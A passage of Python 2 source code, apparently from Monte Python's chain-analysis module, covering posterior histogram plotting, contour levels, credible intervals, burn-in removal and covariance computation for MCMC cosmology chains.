color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
########################################################
# plot 1D mean likelihood in 1D plot #
########################################################
if conf.plot:
# raw mean likelihoods:
#ax1d.plot(info.bincenters, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax1d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
except:
print 'could not find likelihood contour for ',
print info.ref_parameters[info.native_index]
if conf.subplot is True:
if conf.plot_2d:
extent2d = ax2d.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
fig2d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent2d.expanded(1.1, 1.4))
if conf.plot:
extent1d = ax1d.get_window_extent().transformed(
fig1d.dpi_scale_trans.inverted())
fig1d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent1d.expanded(1.1, 1.4))
# Store the function in a file
for info in information_instances:
if not info.ignore_param:
hist_file_name = os.path.join(
info.folder, 'plots',
info.basename+'_%s.hist' % (
standard_name))
write_histogram(hist_file_name,
info.interp_grid, info.interp_hist)
# Now do the rest of the triangle plot
if conf.plot_2d:
for second_index in xrange(index):
second_name = plotted_parameters[second_index]
for info in information_instances:
if not info.ignore_param:
try:
info.native_second_index = info.ref_names.index(
plotted_parameters[second_index])
info.has_second_param = True
second_standard_name = info.backup_names[
info.native_second_index]
except ValueError:
info.has_second_param = False
else:
info.has_second_param = False
ax2dsub = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
(index)*len(plotted_parameters)+second_index+1)
for info in information_instances:
if info.has_second_param:
ax2dsub.axis([info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]])
# 2D likelihood (first step)
#
# simply the histogram from the chains, with few bins only
#
info.n, info.xedges, info.yedges = np.histogram2d(
info.chain[:, info.native_index+2],
info.chain[:, info.native_second_index+2],
weights=info.chain[:, 0],
bins=(info.bins, info.bins),
normed=False)
info.extent = [
info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]]
info.x_centers = 0.5*(info.xedges[1:]+info.xedges[:-1])
info.y_centers = 0.5*(info.yedges[1:]+info.yedges[:-1])
# 2D likelihood (second step)
#
# like for 1D, interpolate to get a finer grid
# TODO: we should not only interpolate between bin centers, but also extrapolate between side bin centers and bin edges
#
interp_y_centers = scipy.ndimage.zoom(info.y_centers,info.interpolation_smoothing, mode='reflect')
interp_x_centers = scipy.ndimage.zoom(info.x_centers,info.interpolation_smoothing, mode='reflect')
interp_likelihood = scipy.ndimage.zoom(info.n,info.interpolation_smoothing, mode='reflect')
# 2D likelihood (third step)
#
# gaussian smoothing
#
sigma = info.interpolation_smoothing*info.gaussian_smoothing
interp_smoothed_likelihood = scipy.ndimage.filters.gaussian_filter(interp_likelihood,[sigma,sigma], mode='reflect')
# Execute some customisation scripts for the 2d contour plots
if (info.custom2d != []):
for elem in info.custom2d:
execfile('plot_files/'+elem)
# plotting contours, using the ctr_level method (from Karim
# Benabed). Note that only the 1 and 2 sigma contours are
# displayed (due to the line with info.levels[:2])
try:
###########################
# plot 2D filled contours #
###########################
if not info.contours_only:
contours = ax2dsub.contourf(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha=info.alphas[info.id])
# now add a thin darker line
# around the 95% contour
ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[1:2]),
zorder=4,
colors = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id],
linewidths=1)
###########################
# plot 2D contours #
###########################
if info.contours_only:
contours = ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent, levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha = info.alphas[info.id],
linewidths=info.line_width)
except Warning:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
except ValueError as e:
if str(e) == "Contour levels must be increasing":
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot. \n " % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]) +
'The error is: "Contour levels must be increasing"' +
" but " + str(ctr_level(info.n, info.levels[:2])) +
" were found. This may happen when most" +
" points fall in the same bin.")
else:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
ax2dsub.set_xticks(info.ticks[info.native_second_index])
ax2dsub.set_yticks(info.ticks[info.native_index])
ax2dsub.tick_params('both',direction='inout',top=True,bottom=True,left=True,right=True)
if index == len(plotted_parameters)-1:
ax2dsub.set_xticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_second_index]],
fontsize=info.ticksize)
if conf.legend_style == 'sides':
ax2dsub.set_xlabel(
info.tex_names[info.native_second_index],
fontsize=info.fontsize)
else:
ax2dsub.set_xticklabels([''])
ax2dsub.set_yticks(info.ticks[info.native_index])
if second_index == 0:
ax2dsub.set_yticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_index]],
fontsize=info.ticksize)
else:
ax2dsub.set_yticklabels([''])
if conf.legend_style == 'sides':
if second_index == 0:
ax2dsub.set_ylabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
if conf.subplot is True:
# Store the individual 2d plots.
if conf.plot_2d:
area = ax2dsub.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
# Pad the saved area by 10% in the x-direction and 20% in
# the y-direction
fig2d.savefig(os.path.join(
conf.folder, 'plots',
file_name+'_2d_%s-%s.%s' % (
standard_name, second_standard_name,
conf.extension)),
bbox_inches=area.expanded(1.4, 1.4))
# store the coordinates of the points for further
# plotting.
store_contour_coordinates(
conf, standard_name, second_standard_name, contours)
for info in information_instances:
if not info.ignore_param and info.has_second_param:
info.hist_file_name = os.path.join(
info.folder, 'plots',
'{0}_2d_{1}-{2}.hist'.format(
info.basename,
standard_name,
second_standard_name))
write_histogram_2d(
info.hist_file_name, info.x_centers, info.y_centers,
info.extent, info.n)
print '-----------------------------------------------'
if conf.plot:
print '--> Saving figures to .{0} files'.format(info.extension)
plot_name = '-vs-'.join([os.path.split(elem.folder)[-1]
for elem in information_instances])
if conf.plot_2d:
# Legend of triangle plot
if ((conf.plot_legend_2d == None) and (len(legends) > 1)) or (conf.plot_legend_2d == True):
# Create a virtual subplot in the top right corner,
# just to be able to anchor the legend nicely
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
len(plotted_parameters),
)
ax2d.axis('off')
try:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
fontsize=info.legendsize)
except TypeError:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
prop={'fontsize': info.legendsize})
fig2d.subplots_adjust(wspace=0, hspace=0)
fig2d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_triangle.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
# Legend of 1D plot
if conf.plot:
if ((conf.plot_legend_1d == None) and (len(legends) > 1)) or (conf.plot_legend_1d == True):
# no space left: add legend to thr right
if len(plotted_parameters)<num_columns*num_lines:
fig1d.legend(legends, legend_names,
loc= ((num_columns-0.9)/num_columns,0.1/num_columns),
fontsize=info.legendsize)
# space left in lower right part: add legend there
else:
fig1d.legend(legends, legend_names,
loc= 'center right',
bbox_to_anchor = (1.2,0.5),
fontsize=info.legendsize)
fig1d.tight_layout()
fig1d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_1d.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
def ctr_level(histogram2d, lvl, infinite=False):
"""
Extract the contours for the 2d plots (Karim Benabed)
"""
hist = histogram2d.flatten()*1.
hist.sort()
cum_hist = np.cumsum(hist[::-1])
cum_hist /= cum_hist[-1]
alvl = np.searchsorted(cum_hist, lvl)[::-1]
clist = [0]+[hist[-i] for i in alvl]+[hist.max()]
if not infinite:
return clist[1:]
return clist
def minimum_credible_intervals(info):
"""
Extract minimum credible intervals (method from Jan Haman) FIXME
"""
histogram = info.hist
bincenters = info.bincenters
levels = info.levels
bounds = np.zeros((len(levels), 2))
j = 0
delta = bincenters[1]-bincenters[0]
left_edge = max(histogram[0] - 0.5*(histogram[1]-histogram[0]), 0.)
right_edge = max(histogram[-1] + 0.5*(histogram[-1]-histogram[-2]), 0.)
failed = False
for level in levels:
norm = float(
(np.sum(histogram)-0.5*(histogram[0]+histogram[-1]))*delta)
norm += 0.25*(left_edge+histogram[0])*delta
norm += 0.25*(right_edge+histogram[-1])*delta
water_level_up = np.max(histogram)*1.0
water_level_down = np.min(histogram)*1.0
top = 0.
iterations = 0
while (abs((top/norm)-level) > 0.0001) and not failed:
top = 0.
water_level = (water_level_up + water_level_down)/2.
#ontop = [elem for elem in histogram if elem > water_level]
indices = [i for i in range(len(histogram))
if histogram[i] > water_level]
# check for multimodal posteriors
if ((indices[-1]-indices[0]+1) != len(indices)):
warnings.warn(
"could not derive minimum credible intervals " +
"for this multimodal posterior")
warnings.warn(
"please try running longer chains or reducing " +
"the number of bins with --bins BINS (default: 20)")
failed = True
break
top = (np.sum(histogram[indices]) -
0.5*(histogram[indices[0]]+histogram[indices[-1]]))*(delta)
# left
if indices[0] > 0:
top += (0.5*(water_level+histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-histogram[indices[0]-1]))
else:
if (left_edge > water_level):
top += 0.25*(left_edge+histogram[indices[0]])*delta
else:
top += (0.25*(water_level + histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-left_edge))
# right
if indices[-1] < (len(histogram)-1):
top += (0.5*(water_level + histogram[indices[-1]]) *
delta*(histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-histogram[indices[-1]+1]))
else:
if (right_edge > water_level):
top += 0.25*(right_edge+histogram[indices[-1]])*delta
else:
top += (0.25*(water_level + histogram[indices[-1]]) *
delta * (histogram[indices[-1]]-water_level) /
(histogram[indices[-1]]-right_edge))
if top/norm >= level:
water_level_down = water_level
else:
water_level_up = water_level
# safeguard, just in case
iterations += 1
if (iterations > 1000):
warnings.warn(
"the loop to check for sigma deviations was " +
"taking too long to converge")
failed = True
break
# min
if failed:
bounds[j][0] = np.nan
elif indices[0] > 0:
bounds[j][0] = bincenters[indices[0]] - delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-histogram[indices[0]-1])
else:
if (left_edge > water_level):
bounds[j][0] = bincenters[0]-0.5*delta
else:
bounds[j][0] = bincenters[indices[0]] - 0.5*delta*(histogram[indices[0]]-water_level)/(histogram[indices[0]]-left_edge)
# max
if failed:
bounds[j][1] = np.nan
elif indices[-1] < (len(histogram)-1):
bounds[j][1] = bincenters[indices[-1]] + delta*(histogram[indices[-1]]-water_level)/(histogram[indices[-1]]-histogram[indices[-1]+1])
else:
if (right_edge > water_level):
bounds[j][1] = bincenters[-1]+0.5*delta
else:
bounds[j][1] = bincenters[indices[-1]] + \
0.5*delta*(histogram[indices[-1]]-water_level) / \
(histogram[indices[-1]]-right_edge)
j += 1
for elem in bounds:
for j in (0, 1):
elem[j] -= info.mean[info.native_index]
return bounds
def write_h(info_file, indices, name, string, quantity, modifiers=None):
"""
Write one horizontal line of output
"""
info_file.write('\n '+name+'\t: ')
for i in indices:
info_file.write(string % quantity[i]+'\t')
def cubic_interpolation(info, hist, bincenters):
"""
Small routine to accomodate the absence of the interpolate module
"""
# we start from a try becuase if anything goes wrong, we want to return the raw histogram rather than nothing
try:
# test that all elements are strictly positive, otherwise we could not take the log, and we must switch to the robust method
for i,elem in enumerate(hist):
if elem == 0.:
hist[i] = 1.e-99
elif elem <0:
print hist[i]
raise exception()
# One of our methods (using polyfit) does assume that the input histogram has a maximum value of 1.
# If in a future version this is not guaranteedanymore, we should renormalise it here.
# This is important for computing weights and thresholds.
# The threshold below which the likelihood will be
# approximated as zero is hard-codeed here (could become an
# input parameter but that would not clearly be useful).:
threshold = 1.e-3
# prepare the interpolation on log(Like):
ln_hist = np.log(hist)
# define a finer grid on a wider range (assuming that the following method is fine both for inter- and extra-polation)
left = max(info.boundaries[info.native_index][0],bincenters[0]-2.5*(bincenters[1]-bincenters[0]))
right = min(info.boundaries[info.native_index][1],bincenters[-1]+2.5*(bincenters[-1]-bincenters[-2]))
interp_grid = np.linspace(left, right, (len(bincenters)+4)*10+1)
######################################
# polynomial fit method (default): #
#####################################W
if info.posterior_smoothing >= 2:
# the points in the histogram with a very low likelihood (i.e. hist[i]<<1 hist is normalised to a maximum of one)
# have a lot of Poisson noise and are unreliable. However, if we do nothing, they may dominate the outcome of the fitted polynomial.
# Hence we can:
# 1) give them less weight (weight = sqrt(hist) seems to work well)
# 2) cut them at some threshold value and base the fit only on higher points
# 3) both
# the one working best seems to be 2). We also wrote 1) below, but copmmented out.
# method 1):
#f = np.poly1d(np.polyfit(bincenters,ln_hist,info.posterior_smoothing,w=np.sqrt(hist)))
#interp_hist = f(interp_grid)
# method 2):
# find index values such that hist is negligble everywhere excepted in hist[sub_indices[0]], hist[sub_indices[-1]]
sub_indices = [i for i,elem in enumerate(hist) if elem > threshold]
# The interpolation is done precisely in this range: hist[sub_indices[0]] < x < hist[sub_indices[-1]]
g = np.poly1d(np.polyfit(bincenters[sub_indices],ln_hist[sub_indices],info.posterior_smoothing)) #,w=np.sqrt(hist[sub_indices])))
# The extrapolation is done in a range including one more bin on each side, excepted when the boundarty is hit
extrapolation_range_left = [info.boundaries[info.native_index][0] if sub_indices[0] == 0 else bincenters[sub_indices[0]-1]]
extrapolation_range_right = [info.boundaries[info.native_index][1] if sub_indices[-1] == len(hist)-1 else bincenters[sub_indices[-1]+1]]
# outisde of this range, log(L) is brutally set to a negligible value,e, log(1.e-10)
interp_hist = [g(elem) if (elem > extrapolation_range_left and elem < extrapolation_range_right) else np.log(1.e-10) for elem in interp_grid]
elif info.posterior_smoothing<0:
raise io_mp.AnalyzeError(
"You passed --posterior-smoothing %d, this value is not understood"%info.posterior_smoothing)
############################################################
# other methods: #
# - linear inter/extra-polation if posterior_smoothing = 0 #
# - cubic inter/extra-polation if posterior_smoothing = 0 #
############################################################
else:
# try first inter/extra-polation
try:
# prepare to interpolate and extrapolate:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear', fill_value='extrapolate')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic', fill_value='extrapolate')
interp_hist = f(interp_grid)
# failure probably caused by old scipy not having the fill_value='extrapolate' argument. Then, only interpoolate.
except:
# define a finer grid but not a wider one
left = max(info.boundaries[info.native_index][0],bincenters[0])
right = min(info.boundaries[info.native_index][1],bincenters[-1])
interp_grid = np.linspace(left, right, len(bincenters)*10+1)
# prepare to interpolate only:
if info.posterior_smoothing == 0:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='linear')
else:
f = scipy.interpolate.interp1d(bincenters, ln_hist, kind='cubic')
interp_hist = f(interp_grid)
# final steps used b y all methods
# go back from ln_Like to Like
interp_hist = np.exp(interp_hist)
# re-normalise the interpolated curve
interp_hist = interp_hist / interp_hist.max()
return interp_hist, interp_grid
except:
# we will end up here if anything went wrong before
# do nothing (raw histogram)
warnings.warn(
"The 1D posterior could not be processed normally, probably" +
"due to incomplete or obsolete numpy and/or scipy versions." +
"So the raw histograms will be plotted.")
return hist, bincenters
def write_histogram(hist_file_name, x_centers, hist):
"""
Store the posterior distribution to a file
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# 1d posterior distribution\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# Histogram\n")
hist_file.write(", ".join(
[str(elem) for elem in hist])+"\n")
print 'wrote ', hist_file_name
def read_histogram(histogram_path):
"""
Recover a stored 1d posterior
"""
with open(histogram_path, 'r') as hist_file:
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = [float(elem) for elem in
hist_file.next().split(",")]
x_centers = np.array(x_centers)
hist = np.array(hist)
return x_centers, hist
def write_histogram_2d(hist_file_name, x_centers, y_centers, extent, hist):
"""
Store the histogram information to a file, to plot it later
"""
with open(hist_file_name, 'w') as hist_file:
hist_file.write("# Interpolated histogram\n")
hist_file.write("\n# x_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in x_centers])+"\n")
hist_file.write("\n# y_centers\n")
hist_file.write(", ".join(
[str(elem) for elem in y_centers])+"\n")
hist_file.write("\n# Extent\n")
hist_file.write(", ".join(
[str(elem) for elem in extent])+"\n")
hist_file.write("\n# Histogram\n")
for line in hist:
hist_file.write(", ".join(
[str(elem) for elem in line])+"\n")
def read_histogram_2d(histogram_path):
"""
Read the histogram information that was stored in a file.
To use it, call something like this:
.. code::
x_centers, y_centers, extent, hist = read_histogram_2d_from_file(path)
fig, ax = plt.subplots()
ax.contourf(
y_centers, x_centers, hist, extent=extent,
levels=ctr_level(hist, [0.68, 0.95]),
zorder=5, cma=plt.cm.autumn_r)
plt.show()
"""
with open(histogram_path, 'r') as hist_file:
length = 0
for line in hist_file:
if line:
if line.find("# x_centers") != -1:
x_centers = [float(elem) for elem in
hist_file.next().split(",")]
length = len(x_centers)
elif line.find("# y_centers") != -1:
y_centers = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Extent") != -1:
extent = [float(elem) for elem in
hist_file.next().split(",")]
elif line.find("# Histogram") != -1:
hist = []
for index in range(length):
hist.append([float(elem) for elem in
hist_file.next().split(",")])
x_centers = np.array(x_centers)
y_centers = np.array(y_centers)
extent = np.array(extent)
hist = np.array(hist)
return x_centers, y_centers, extent, hist
def clean_conversion(module_name, tag, folder):
"""
Execute the methods "convert" from the different sampling algorithms
Returns True if something was made, False otherwise
"""
has_module = False
subfolder_name = tag+"_subfolder"
try:
module = importlib.import_module(module_name)
subfolder = getattr(module, subfolder_name)
has_module = True
except ImportError:
# The module is not installed, the conversion can not take place
pass
if has_module and os.path.isdir(folder):
# Remove any potential trailing slash
folder = os.path.join(
*[elem for elem in folder.split(os.path.sep) if elem])
if folder.split(os.path.sep)[-1] == subfolder:
try:
getattr(module, 'from_%s_output_to_chains' % tag)(folder)
except IOError:
raise io_mp.AnalyzeError(
"You asked to analyze a %s folder which " % tag +
"seems to come from an unfinished run, or to be empty " +
"or corrupt. Please make sure the run went smoothly " +
"enough.")
warnings.warn(
"The content of the %s subfolder has been " % tag +
"translated for Monte Python. Please run an "
"analysis of the entire folder now.")
return True
else:
return False
def separate_files(files):
"""
Separate the input files in folder
Given all input arguments to the command line files entry, separate them in
a list of lists, grouping them by folders. The number of identified folders
will determine the number of information instances to create
"""
final_list = []
temp = [files[0]]
folder = (os.path.dirname(files[0]) if os.path.isfile(files[0])
else files[0])
if len(files) > 1:
for elem in files[1:]:
new_folder = (os.path.dirname(elem) if os.path.isfile(elem)
else elem)
if new_folder == folder:
temp.append(elem)
else:
folder = new_folder
final_list.append(temp)
temp = [elem]
final_list.append(temp)
return final_list
def recover_folder_and_files(files):
"""
Distinguish the cases when analyze is called with files or folder
Note that this takes place chronologically after the function
`separate_files`"""
# The following list defines the substring that a chain should contain for
# the code to recognise it as a proper chain.
substrings = ['.txt', '__']
# The following variable defines the substring that identify error_log
# files and therefore there must not be taken into account in the analysis.
substring_err = 'error_log'
limit = 10
# If the first element is a folder, grab all chain files inside
if os.path.isdir(files[0]):
folder = os.path.normpath(files[0])
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
and (substring_err not in elem)
and all([x in elem for x in substrings])]
# Otherwise, extract the folder from the chain file-name.
else:
# If the name is completely wrong, say it
if not os.path.exists(files[0]):
raise io_mp.AnalyzeError(
"You provided a non-existant folder/file to analyze")
folder = os.path.relpath(
os.path.dirname(os.path.realpath(files[0])), os.path.curdir)
files = [os.path.join(folder, elem) for elem in os.listdir(folder)
if os.path.join(folder, elem) in np.copy(files)
and not os.path.isdir(os.path.join(folder, elem))
and not os.path.getsize(os.path.join(folder, elem)) < limit
and (substring_err not in elem)
and all([x in elem for x in substrings])]
basename = os.path.basename(folder)
return folder, files, basename
def extract_array(line):
"""
Return the array on the RHS of the line
>>> extract_array("toto = ['one', 'two']\n")
['one', 'two']
>>> extract_array('toto = ["one", 0.2]\n')
['one', 0.2]
"""
# Recover RHS of the equal sign, and remove surrounding spaces
rhs = line.split('=')[-1].strip()
# Remove array signs
rhs = rhs.strip(']').lstrip('[')
# Recover each element of the list
sequence = [e.strip().strip('"').strip("'") for e in rhs.split(',')]
for index, elem in enumerate(sequence):
try:
sequence[index] = int(elem)
except ValueError:
try:
sequence[index] = float(elem)
except ValueError:
pass
return sequence
def extract_dict(line):
"""
Return the key and value of the dictionary element contained in line
>>> extract_dict("something['toto'] = [0, 1, 2, -2, 'cosmo']")
'toto', [0, 1, 2, -2, 'cosmo']
"""
# recovering the array
sequence = extract_array(line)
# Recovering only the LHS
lhs = line.split('=')[0].strip()
# Recovering the name from the LHS
name = lhs.split('[')[-1].strip(']')
name = name.strip('"').strip("'")
return name, sequence
def extract_parameter_names(info):
"""
Reading the log.param, store in the Information instance the names
"""
backup_names = []
plotted_parameters = []
boundaries = []
ref_names = []
tex_names = []
scales = []
with open(info.param_path, 'r') as param:
for line in param:
if line.find('#') == -1:
if line.find('data.experiments') != -1:
info.experiments = extract_array(line)
if line.find('data.parameters') != -1:
name, array = extract_dict(line)
original = name
# Rename the names according the .extra file (opt)
if name in info.to_change.iterkeys():
name = info.to_change[name]
# If the name corresponds to a varying parameter (fourth
# entry in the initial array being non-zero, or a derived
# parameter (could be designed as fixed, it does not make
# any difference)), then continue the process of analyzing.
if array[3] != 0 or array[5] == 'derived':
# The real name is always kept, to have still the class
# names in the covmat
backup_names.append(original)
# With the list "to_plot", we can potentially restrict
# the variables plotted. If it is empty, though, simply
# all parameters will be plotted.
if info.to_plot == []:
plotted_parameters.append(name)
else:
if name in info.to_plot:
plotted_parameters.append(name)
# Append to the boundaries array
boundaries.append([
None if elem == 'None' or (isinstance(elem, int)
and elem == -1)
else elem for elem in array[1:3]])
ref_names.append(name)
# Take care of the scales
scale = array[4]
rescale = 1.
if name in info.new_scales.iterkeys():
scale = info.new_scales[name]
rescale = info.new_scales[name]/array[4]
scales.append(rescale)
# Given the scale, decide for the pretty tex name
number = 1./scale
tex_names.append(
io_mp.get_tex_name(name, number=number))
scales = np.diag(scales)
info.ref_names = ref_names
info.tex_names = tex_names
info.boundaries = boundaries
info.backup_names = backup_names
info.scales = scales
# Beware, the following two numbers are different. The first is the total
# number of parameters stored in the chain, whereas the second is for
# plotting purpose only.
info.number_parameters = len(ref_names)
info.plotted_parameters = plotted_parameters
def find_maximum_of_likelihood(info):
"""
Finding the global maximum of likelihood
min_minus_lkl will be appended with all the maximum likelihoods of files,
then will be replaced by its own maximum. This way, the global
maximum likelihood will be used as a reference, and not each chain's
maximum.
"""
min_minus_lkl = []
for chain_file in info.files:
# cheese will brutally contain everything (- log likelihood) in the
# file chain_file being scanned.
# This could potentially be faster with pandas, but is already quite
# fast
#
# This would read the chains including comment lines:
#cheese = (np.array([float(line.split()[1].strip())
# for line in open(chain_file, 'r')]))
#
# This reads the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([float(line.split()[1].strip())
for line in ifilterfalse(iscomment,f)]))
try:
min_minus_lkl.append(cheese[:].min())
except ValueError:
pass
# beware, it is the min because we are talking about
# '- log likelihood'
# Selecting only the true maximum.
try:
min_minus_lkl = min(min_minus_lkl)
except ValueError:
raise io_mp.AnalyzeError(
"No decently sized chain was found in the desired folder. " +
"Please wait to have more accepted point before trying " +
"to analyze it.")
info.min_minus_lkl = min_minus_lkl
def remove_bad_points(info):
"""
Create an array with all the points from the chains, after removing non-markovian, burn-in and fixed fraction
"""
# spam will brutally contain all the chains with sufficient number of
# points, after the burn-in was removed.
spam = list()
# Recover the longest file name, for pleasing display
max_name_length = max([len(e) for e in info.files])
# Total number of steps done:
steps = 0
accepted_steps = 0
# Open the log file
log = open(info.log_path, 'w')
for index, chain_file in enumerate(info.files):
# To improve presentation, and print only once the full path of the
# analyzed folder, we recover the length of the path name, and
# create an empty complementary string of this length
total_length = 18+max_name_length
empty_length = 18+len(os.path.dirname(chain_file))+1
basename = os.path.basename(chain_file)
if index == 0:
exec "print '--> Scanning file %-{0}s' % chain_file,".format(
max_name_length)
else:
exec "print '%{0}s%-{1}s' % ('', basename),".format(
empty_length, total_length-empty_length)
# cheese will brutally contain everything in the chain chain_file being
# scanned
#
# This would read the chains including comment lines:
#cheese = (np.array([[float(elem) for elem in line.split()]
# for line in open(chain_file, 'r')]))
#
# This read the chains excluding comment lines:
with open(chain_file, 'r') as f:
cheese = (np.array([[float(elem) for elem in line.split()]
for line in ifilterfalse(iscomment,f)]))
# If the file contains a broken line with a different number of
# elements, the previous array generation might fail, and will not have
# the correct shape. Hence the following command will fail. To avoid
# that, the error is caught.
try:
local_min_minus_lkl = cheese[:, 1].min()
except IndexError:
raise io_mp.AnalyzeError(
"Error while scanning %s." % chain_file +
" This file most probably contains "
"an incomplete line, rendering the analysis impossible. "
"I think that the following line(s) is(are) wrong:\n %s" % (
'\n '.join(
['-> %s' % line for line in
open(chain_file, 'r') if
len(line.split()) != len(info.backup_names)+2])))
line_count = float(sum(1 for line in open(chain_file, 'r')))
# Logging the information obtained until now.
number_of_steps = cheese[:, 0].sum()
log.write("%s\t " % os.path.basename(chain_file))
log.write(" Number of steps:%d\t" % number_of_steps)
log.write(" Steps accepted:%d\t" % line_count)
log.write(" acc = %.2g\t" % (float(line_count)/number_of_steps))
log.write("min(-loglike) = %.2f\n" % local_min_minus_lkl)
steps += number_of_steps
accepted_steps += line_count
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
info.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
info.update = 0
# Removing non-markovian part, burn-in, and fraction= (1 - keep-fraction)
start = 0
markovian=0
try:
# Read all comments in chains about times when proposal was updated
# The last of these comments gives the number of lines to be skipped in the files
if info.markovian and not info.update:
with open(chain_file, 'r') as f:
for line in ifilter(iscomment,f):
start = int(line.split()[2])
markovian = start
# Remove burn-in, defined as all points until the likelhood reaches min_minus_lkl+LOG_LKL_CUTOFF
while cheese[start, 1] > info.min_minus_lkl+LOG_LKL_CUTOFF:
start += 1
burnin = start-markovian
# Remove fixed fraction as requested by user (usually not useful if non-markovian is also removed)
if info.keep_fraction < 1:
start = start + int((1.-info.keep_fraction)*(line_count - start))
print ": Removed",
if info.markovian:
print "%d non-markovian points," % markovian,
print "%d points of burn-in," % burnin,
if info.keep_fraction < 1:
print "and first %.0f percent," % (100.*(1-info.keep_fraction)),
print "keep %d steps" % (line_count-start)
except IndexError:
print ': Removed everything: chain not converged'
# ham contains cheese without the burn-in, if there are any points
# left (more than 5)
if np.shape(cheese)[0] > start+5:
ham = np.copy(cheese[int(start)::])
# Deal with single file case
if len(info.files) == 1:
warnings.warn("Convergence computed for a single file")
bacon = np.copy(cheese[::3, :])
egg = np.copy(cheese[1::3, :])
sausage = np.copy(cheese[2::3, :])
spam.append(bacon)
spam.append(egg)
spam.append(sausage)
continue
# Adding resulting table to spam
spam.append(ham)
# Test the length of the list
if len(spam) == 0:
raise io_mp.AnalyzeError(
"No decently sized chain was found. " +
"Please wait a bit to analyze this folder")
# Applying now new rules for scales, if the name is contained in the
# referenced names
for name in info.new_scales.iterkeys():
try:
index = info.ref_names.index(name)
for i in xrange(len(spam)):
spam[i][:, index+2] *= 1./info.scales[index, index]
except ValueError:
# there is nothing to do if the name is not contained in ref_names
pass
info.steps = steps
info.accepted_steps = accepted_steps
return spam
def compute_mean(mean, spam, total):
"""
"""
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
submean = np.sum(spam[j][:, 0]*spam[j][:, i+2])
mean[j+1, i] = submean / total[j+1]
mean[0, i] += submean
mean[0, i] /= total[0]
def compute_variance(var, mean, spam, total):
"""
"""
for i in xrange(np.shape(var)[1]):
for j in xrange(len(spam)):
var[0, i] += np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[0, i])**2)
var[j+1, i] = np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[j+1, i])**2) / \
(total[j+1]-1)
var[0, i] /= (total[0]-1)
def compute_covariance_matrix(info):
"""
"""
covar = np.zeros((len(info.ref_names), len(info.ref_names)))
for i in xrange(len(info.ref_names)):
for j in xrange(i, len(info.ref_names)):
covar[i, j] = (
info.chain[:, 0]*(
(info.chain[:, i+2]-info.mean[i]) *
(info.chain[:, j+2]-info.mean[j]))).sum()
if i != j:
covar[j, i] = covar[i, j]
covar /= info.total
# Removing scale factors in order to store true parameter covariance
covar = np.dot(info.scales.T, np.dot(covar, info.scales))
return covar
def adjust_ticks(param, information_instances):
"""
"""
if len(information_instances) == 1:
return
